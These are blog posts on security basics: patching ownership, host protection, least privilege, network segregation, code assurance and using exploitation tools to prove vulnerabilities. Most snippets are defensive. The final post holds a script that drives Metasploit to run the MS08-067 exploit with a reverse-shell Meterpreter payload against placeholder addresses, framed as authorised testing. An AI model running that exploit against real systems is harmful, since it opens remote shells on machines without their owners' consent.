Who is responsible for patching?

Midweek rant.

How many times have conversations along the lines of:

‘we are waiting for security to tell us what to patch’

occurred?

Why do teams responsible for running and maintaining systems persist in making patching a security issue?

I would challenge this and go as far as to say it is fundamentally wrong.

Patching / maintaining / updating systems must be seen as a core part of running a solution.

No solution should ever be deployed into a production environment without clear ownership and agreed processes for maintaining it.

The role of the security team should be to provide assurance that the environment is being patched and maintained according to the agreed processes.

Simple.

This would change your weekly / monthly patching / vulnerability management meetings from ‘here are all the patches that are past due and must be applied’ to ‘great job guys, 90% of patches applied, let’s discuss the few outliers’.

Also, what happens with all the non-security patches in these environments? Are they ever applied? How are systems kept up to date?

So – maintain your systems.  Patch them.  Keep them up to date.  Let security provide assurance that this is happening.  Simple.

This approach also allows people to spend far more time working on the hard security problems, rather than spending half their lives talking about why patching has not happened!

A slightly blunt one, but I strongly believe this shift in responsibility and accountability must occur if the patching crisis is ever to be resolved.

The next post will be back to the range of topics I have been discussing recently.

K

 

2016 Resolutions. The detail..

As promised, this follow up post will outline what I mean by each of the ‘resolutions’ I highlighted.

These were:

  1. Patch.  Everything.  On time.
  2. Protect your hosts.  Do application whitelisting.
  3. No admin rights for anyone who can access production data.
    1. No one with admin rights can access data.
  4. Role Based Access.
  5. Segregate your networks.
  6. If you create code, do solid code assurance.
  7. Test and Audit.

 

1. Patch.  Everything.  On time.

Sounds simple right?  It should be, but it seems it isn’t in many companies.  From my experience there seem to be two main drivers behind so many companies failing this most basic of maintenance tasks:

  • Systems that must have almost 100% uptime, with no, or ill-defined, patching windows and processes.  This goes hand in hand with these solutions being incorrectly designed: if a system must always be ‘up’, design it in such a way that components can be taken out of service to be patched and maintained (or indeed to fail) without taking the whole solution down.
  • Incorrect ownership of, and drivers for, the patching process.  In many organisations it seems to be the security team who drive the need to apply ‘security’ patches.  This needs to be turned around.  Any system in production must be patched and maintained as part of BAU (Business As Usual).  Systems / solutions should never be handed over into production without clear ownership and agreed processes for maintaining them, and this must include patching.  Security then becomes an assurance function whose scans / checks confirm that the process is being correctly followed, as well as highlighting any gaps; see the sketch below.
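To make that assurance role concrete, here is a minimal sketch of the sort of compliance check I have in mind.  It assumes a hypothetical CSV export from your patch management tooling (the file name and column names are mine, not from any particular product) and reports, per owning team, what percentage of patches were applied within an agreed window:

```python
import csv
from collections import defaultdict

MAX_AGE_DAYS = 30  # illustrative SLA agreed with the system owners


def patch_compliance(path: str) -> None:
    """Summarise patch compliance per owning team from a CSV export.

    Expected columns (hypothetical): host, owner, patch_id, days_outstanding.
    """
    totals = defaultdict(int)
    overdue = defaultdict(list)

    with open(path, newline="") as f:
        for row in csv.DictReader(f):
            owner = row["owner"]
            totals[owner] += 1
            if int(row["days_outstanding"]) > MAX_AGE_DAYS:
                overdue[owner].append((row["host"], row["patch_id"]))

    for owner, total in sorted(totals.items()):
        late = len(overdue[owner])
        pct = 100 * (total - late) / total
        print(f"{owner}: {pct:.0f}% of patches applied on time ({total} total)")
        for host, patch in overdue[owner]:
            print(f"  overdue: {patch} on {host}")


if __name__ == "__main__":
    patch_compliance("patch_status.csv")
```

Run against a regular export, this produces exactly the ‘90% applied, let’s discuss the outliers’ conversation rather than a list of blame.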

If you see these issues in your organisation, make 2016 the year you address them; don’t be the next business in the headlines, hacked because of systems that have not been patched for months!

2. Protect your hosts. Do application whitelisting.

With the ever more porous nature of our networks and perimeters, coupled with the insider threat, phishing and the like, protecting our hosts is becoming ever more critical.

AV (Anti-Virus / Anti-Malware) is not dead, but it clearly is not enough on its own.  Indeed, you will struggle to find any host protection product that only does AV these days.  Ensure all your hosts, both servers and user endpoints, are running a solid, up-to-date and centrally managed host protection solution (or solutions) providing anti-malware, host IPS (Intrusion Prevention System), host firewalling and ideally FIM (File Integrity Monitoring).
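To give a flavour of what the FIM piece does, here is a minimal sketch of a file integrity check using only the Python standard library.  A real host protection product does far more (central management, tamper protection, real-time hooks), and the watched paths here are purely illustrative:

```python
import hashlib
import json
from pathlib import Path

WATCHED = ["/etc/passwd", "/etc/ssh/sshd_config"]  # illustrative paths
BASELINE_FILE = "fim_baseline.json"


def sha256(path: str) -> str:
    """Hash a file's contents so any change is detectable."""
    return hashlib.sha256(Path(path).read_bytes()).hexdigest()


def build_baseline() -> None:
    """Record known-good hashes; run once from a trusted state."""
    Path(BASELINE_FILE).write_text(json.dumps({p: sha256(p) for p in WATCHED}))


def check_baseline() -> None:
    """Compare current hashes against the baseline and flag changes."""
    baseline = json.loads(Path(BASELINE_FILE).read_text())
    for path, expected in baseline.items():
        if sha256(path) != expected:
            print(f"ALERT: {path} has changed since the baseline was taken")


if __name__ == "__main__":
    build_baseline()  # in practice, baseline once and schedule the check
    check_baseline()
```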

I’m gradually trying to change people’s language from AV / anti-malware to host protection, as I think this covers both the requirement and many of the solutions far better.

In addition to this I would strongly recommend the use of an application whitelisting solution, as this can provide a key defence by preventing any unapproved (or malicious) software from running.  As well as blocking malware, these solutions have the added benefit of helping to maintain a known environment, running only known and approved software.
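The decision logic behind whitelisting is simple, even if the enforcement (which real products do down at the operating system level) is not.  Here is a minimal sketch of the hash-based allow / block decision, with invented directory and file names:

```python
import hashlib
from pathlib import Path


def sha256(path: Path) -> str:
    return hashlib.sha256(path.read_bytes()).hexdigest()


def build_allowlist(approved_dir: str) -> set:
    """Hash every file in a directory of vetted, approved binaries."""
    return {sha256(p) for p in Path(approved_dir).iterdir() if p.is_file()}


def is_approved(binary: str, allowlist: set) -> bool:
    """Only binaries whose hash is on the allowlist may run."""
    p = Path(binary)
    return p.is_file() and sha256(p) in allowlist


if __name__ == "__main__":
    # "approved_software" is an illustrative directory of known-good binaries.
    allowlist = build_allowlist("approved_software")
    for candidate in ["/usr/bin/ssh", "/tmp/unknown_download"]:
        verdict = "allowed" if is_approved(candidate, allowlist) else "BLOCKED"
        print(f"{candidate}: {verdict}")
```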

3. No admin rights for anyone who can access production data.  No one with admin rights can access data.

This is something I am currently championing as a great way to reduce the risk to your organisation’s data.

This may be harder for very small organisations, but for medium and larger ones, think about the different roles your teams have.

How many of the people who need to access key data, e.g. via production applications, genuinely require administrative rights on their end user systems, or on the production systems?

Conversely, how many of the system administrators who maintain systems and databases etc. need access to the actual production data in order to perform their duties?

One of the most common ways malware gains a foothold is via users with administrative privileges.  So if we prevent any user with these elevated privileges from having access to data, then even if they or their systems are compromised, the risk of data loss or damage to data integrity is massively reduced.
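A good first step is simply to measure the overlap.  The sketch below (group names and members are invented) flags every account that both has admin rights and can access production data; each hit is a candidate for splitting into two separate accounts:

```python
# Illustrative memberships, e.g. exported from your directory service.
admins = {"alice", "bob", "svc_backup"}
data_access = {"bob", "carol", "svc_backup"}

# Any account in both sets breaks the separation principle.
for account in sorted(admins & data_access):
    print(f"{account}: has admin rights AND access to production data")
```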

While it may seem a substantial challenge to prevent administrators from having access to data, there are at least a couple of obvious options.

Some host protection solutions claim to offer separation-of-duties capabilities that control who can access data, rather than relying solely on O/S (Operating System) permissions.  I have not tested these myself, though.

Various companies offer transparent encryption solutions that have their own set of ACLs (Access Control Lists), managed independently of the O/S permissions.  These can be managed by, for example, the security team to ensure only approved business users can access data, while still permitting administrators to perform their role.

4. Role Based Access.

This one should hopefully require minimal explanation.  Each type of user should have a defined role, with associated system permissions allowing them to access the data and carry out the tasks their role requires.

This ensures people can only access the data they are supposed to, and nothing more.  The principle of ‘least privilege’ must be adhered to when creating roles and applying permissions, so that everyone can perform their duties but cannot carry out tasks beyond those that are approved.
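As a minimal sketch of the idea (the role and permission names are invented), a role is nothing more than an explicit set of grants, and anything not granted is denied:

```python
# Illustrative roles: each lists the only permissions it grants.
ROLES = {
    "claims_handler": {"claims:read", "claims:update"},
    "claims_auditor": {"claims:read"},
    "dba": {"db:maintain"},  # note: no permissions on the data itself
}


def is_permitted(role: str, permission: str) -> bool:
    """Least privilege: anything not explicitly granted is denied."""
    return permission in ROLES.get(role, set())


assert is_permitted("claims_handler", "claims:update")
assert not is_permitted("claims_auditor", "claims:update")
assert not is_permitted("dba", "claims:read")  # ties back to point 3
```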

This can be backed up by using some form of IAM (Identity and Access Management) solution, although be careful about over-complicating things: a cumbersome IAM solution is hard to justify unless your organisation is large and complex enough to warrant it.

5. Segregate your networks.

In addition to external firewalls preventing access from outside your organisation, internal networks must be segregated as well.

When designing your networks, think carefully about which systems need to talk to each other, and on which ports.

For example, do your end user systems all need to access all of the production environments?  Or do some of your teams need access to some production systems and only on specific application ports?

This point links with the host protection one above, as host firewalls can be used to further prevent unauthorised access to systems.  Most servers do not need to connect to all the other servers in the same zone.  Host firewalls can stop servers connecting to others they have no need to reach, without requiring an overly complex network design.
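One way to keep host firewall rules manageable at scale is to derive them from a single table of approved flows.  The sketch below prints iptables-style allow rules plus a default deny; the hosts, ports and purposes are invented, and it illustrates the approach rather than being a drop-in script:

```python
# Approved flows: (source host or network, destination port, purpose).
APPROVED_FLOWS = [
    ("10.0.1.10", 5432, "app server to database"),
    ("10.0.2.0/24", 443, "web tier to API"),
]


def render_rules(flows) -> None:
    """Emit an allow rule per approved flow, then deny everything else."""
    for src, port, purpose in flows:
        print(f"iptables -A INPUT -p tcp -s {src} --dport {port} -j ACCEPT"
              f"  # {purpose}")
    print("iptables -P INPUT DROP  # default deny")


if __name__ == "__main__":
    render_rules(APPROVED_FLOWS)
```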

Strong network and system segregation will help prevent the spread of any malware or malicious users within the organisation’s IT estate, and thus help ensure data is not removed or changed.

6. If you create code, do solid code assurance.

The OWASP Top 10 has changed little for several years (look it up if you are not familiar).  Applications consistently have known and well understood vulnerabilities, and these same vulnerabilities are consistently exploited by malicious people.

If you create applications, ensure the code goes through rigorous manual and automated code reviews.  Ensure the application is thoroughly tested against not just the business’s functional requirements, but also the non-functional requirements from the security team.

Finally, before the application or substantial change goes live ensure it is penetration / security tested by experts.

Performing all these checks does not guarantee your application cannot be hacked, but it will ensure that it is not an easy target.  Ideally these steps should be key, non-negotiable parts of your organisation’s SDLC (Software / System Development Life Cycle).
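One concrete way to make the automated part non-negotiable is to wire a scan into the build so the build fails when the scan fails.  Here is a minimal sketch, assuming a Python codebase and using Bandit (an open source static analysis tool for Python code); substitute whatever scanner suits your stack:

```python
import subprocess
import sys


def run_security_scan(source_dir: str) -> int:
    """Fail the build if the static security scan reports findings."""
    # bandit -r recurses through the source tree; a non-zero exit
    # code indicates findings (or that the scan itself failed).
    result = subprocess.run(["bandit", "-r", source_dir])
    return result.returncode


if __name__ == "__main__":
    sys.exit(run_security_scan("src"))  # "src" is an illustrative path
```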

7. Test and Audit.

Once you have the basics in place, you need to ensure they are being successfully applied.  This is where the assurance part of the security team’s role comes into play.  Whether it is supporting the SDLC processes or scanning systems for outstanding patches, the security team can, and must, assure that the agreed tasks and processes are being adhered to.

This step is critical to the ongoing success of the previous items; the effort and expertise required to complete it should not be underestimated.

 

Hopefully this has supplied some clarity and context to my previous post and made my intent clear.  Let me know.

In some following posts I’ll start talking about some of the really fun and intelligent things you can start doing once the basics are in place!

K

2016 Security Resolutions

It’s that time of year again, everyone will be writing their resolutions and predictions for the year.

Will we have more of the same?  More APTs?  More nation state sponsored breaches?  DDoS?  Increased application attacks?  More mobile malware?

Probably.

We all know there will be hackers, criminals, hacktivists, malicious insiders, nation state actors etc.  We also all know there will be application attacks, malware, APTs, DDoS etc.

Rather than write another predictions article, I thought I’d try a slightly different tack and cover the key things I think every organisation MUST do if they are not already.

  1. Patch.  Everything.  On time.
  2. Protect your hosts.  Do application whitelisting.
  3. No admin rights for anyone who can access production data.
    1. No one with admin rights can access data.
  4. Role Based Access.
  5. Segregate your networks.
  6. If you create code, do solid code assurance.
  7. Test and Audit.

Get the basics right!  There are of course many other things to focus on, but hopefully the general idea is clear.  Organisations need to be wary of throwing too much time and money at the latest and greatest APT protection, behavioural analysis, and overcomplicated solutions to simple problems.  Getting the basics right must be the first priority.

Remember, it is extremely likely that attackers will go after the low-hanging fruit.  Even if they are directly targeting your organisation, it is unpatched systems, people with admin rights, and unprotected hosts or applications that will be attacked first.  Only after these avenues have failed will they resort to more challenging and advanced attacks.

I’ll use a follow-up post to cover the above points in more detail, but wanted to get these initial thoughts up.

What do you think?  How is your organisation doing with the basics?  Do you spend too much time on new, sexy security when you don’t have the basics covered?

Happy new year all!

K

 

 

Malware everywhere, even on Apples..

Various sources have been reporting on the recent Java hole that enabled malicious individuals to infect upwards of 600,000 Apple Macs that were running the latest, fully patched version of the O/S.

This Java vulnerability was actually known about some time last year and has been patched on other systems.  Apple, in its continued, and frankly misguided, belief that its systems are safe and don’t need protection like anti-virus software, chose not to patch the hole until hundreds of thousands of its customers had been infected.

The reality is that all consumer computer systems have vulnerabilities and it should be the expected duty of vendors to patch these as quickly as possible to protect their customers and their privacy.

We have all knocked companies like Microsoft for the number of vulnerabilities and attacks that have occurred against their software, but the reality is that over the last few years Microsoft has made huge progress in producing more secure software, patching in a very timely manner, providing free tools like anti-virus, and working with law enforcement to bring down criminal botnets.

Apple has avoided many exploits being created for its platforms because it has historically been such a niche player.  Why create an exploit for a few machines when you can create one for orders of magnitude more?  As Apple has become more successful, and uptake of its products in offices has increased, it has become a more interesting and valuable target for criminals looking to exploit any vulnerabilities.

It is time for Apple to pull its socks up from a security standpoint, and to become both more proactive and more transparent in how it deals with issues and helps protect its customers.

For us users of any operating system, it’s yet another reminder that we should keep our systems patched and run software to protect us from viruses and other malware.  Oh, and not to trust vendors when they tell us their systems are safe and don’t need further protection.

Some detail and commentary on this issue can be found at the links below:

http://nakedsecurity.sophos.com/2012/04/04/apple-patches-java-hole-that-was-being-used-to-compromise-mac-users/?utm_source=Naked+Security+-+Sophos+List&utm_medium=email&utm_campaign=a6d16b7680-naked%252Bsecurity

http://news.cnet.com/8301-13579_3-57410476-37/apples-security-code-of-silence-a-big-problem/?part=rss&subj=news&tag=2547-1_3-0-20&tag=nl.e703

K

Exploit vulnerabilities rather than just report on ‘hypothetical’ issues

While doing some general reading recently I came across an article entitled “Why aren’t you using Metasploit to expose Windows vulnerabilities?”.  This reminded me of something I have discussed with people a few times: the benefits of actually proving and demonstrating how vulnerabilities can be exploited, rather than just relying on metrics from scanners.

Don’t get me wrong, vulnerability / patch scanners are incredibly useful for providing an overall view of the status of an environment:

– Are patches being deployed consistently across the environment in a timely manner?

– Are rules around password complexity, membership of the administrators group, and the placement of machines and users in the correct locations in the LDAP directory being obeyed?

– Are software and O/S versions and types in line with the requirements / tech stack?

– etc.

The output from these scanners is also useful, and extensively used, in providing compliance / regulatory report data confirming that an environment is ‘correctly’ maintained.
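Many of these checks are also cheap to reproduce for spot assurance.  As a flavour, the sketch below compares the members of a local admin-capable group against an approved list; the group name and the approved set are illustrative, and in a real estate you would pull both from your directory or your scanner:

```python
import grp  # standard library group lookups on Unix-like systems

APPROVED_ADMINS = {"alice", "bob"}  # illustrative approved list


def check_admin_group(group_name: str) -> None:
    """Flag anyone in the admin group who is not on the approved list."""
    members = set(grp.getgrnam(group_name).gr_mem)
    for account in sorted(members - APPROVED_ADMINS):
        print(f"POLICY VIOLATION: {account} is in '{group_name}' "
              f"but not on the approved list")


if __name__ == "__main__":
    check_admin_group("sudo")  # e.g. the sudo group on many Linux systems
```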

Where these scans fall short is in two main areas:

1. They do not provide a real picture of the actual risk any of the identified vulnerabilities pose to your organisation, in your configuration, with your policies and rules applied.

2. Because of point 1, they may either fail to give senior management enough appreciation of the risks to put sufficient priority / emphasis on remediating them, or they may cause far too much fear, given the many identified vulnerabilities that may or may not actually be exploitable.

In order to provide a practical demonstration of how easy (or difficult) it is to exploit identified vulnerabilities, and also to demonstrate to management how these reported vulnerabilities can actually be exploited, using tools such as Core Impact, Canvas or Metasploit in addition to just scanning for vulnerabilities is key.

Tools like Canvas and Core Impact are commercial offerings with relatively high price tags; Metasploit, however, is open source and free to use in both Windows and *nix environments.  It even has a GUI!  So there is no excuse for not actually testing some key vulnerabilities identified by your scans, then demonstrating the results to senior management and even other IT staff to increase awareness.
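If you would rather script it than drive the console by hand, msfconsole can replay a resource file of commands via its -r flag.  Here is a minimal sketch that writes and runs such a file from Python; the target addresses are illustrative placeholders (TEST-NET range), and of course you should only ever point tools like this at systems you are authorised to test:

```python
import subprocess
from pathlib import Path

# All addresses below are illustrative; only ever test systems you
# are authorised to test.
RESOURCE = """\
use exploit/windows/smb/ms08_067_netapi
set RHOST 192.0.2.10
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.0.2.99
exploit -z
exit
"""


def run_msf(resource_text: str) -> None:
    """Replay a Metasploit resource script via msfconsole -r."""
    script = Path("demo.rc")
    script.write_text(resource_text)
    # -q suppresses the banner, -r replays the resource file.
    subprocess.run(["msfconsole", "-q", "-r", str(script)])


if __name__ == "__main__":
    run_msf(RESOURCE)
```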

Metasploit can be found here:

http://www.metasploit.com/

It can be downloaded for free, and should you wish to contribute to its success there are also paid-for versions.

The key message here is: don’t stop using the standard patch / vulnerability scans, as these are key to providing a picture of the entire environment and assurance of compliance with policies.  However, they should be supplemented by actually exploiting some key vulnerabilities, to provide evidence of the actual risk in your environment rather than just the usual ‘arbitrary code execution’ or similar statement about a potential vulnerability.  This will put much more weight behind your arguments for improving security.

K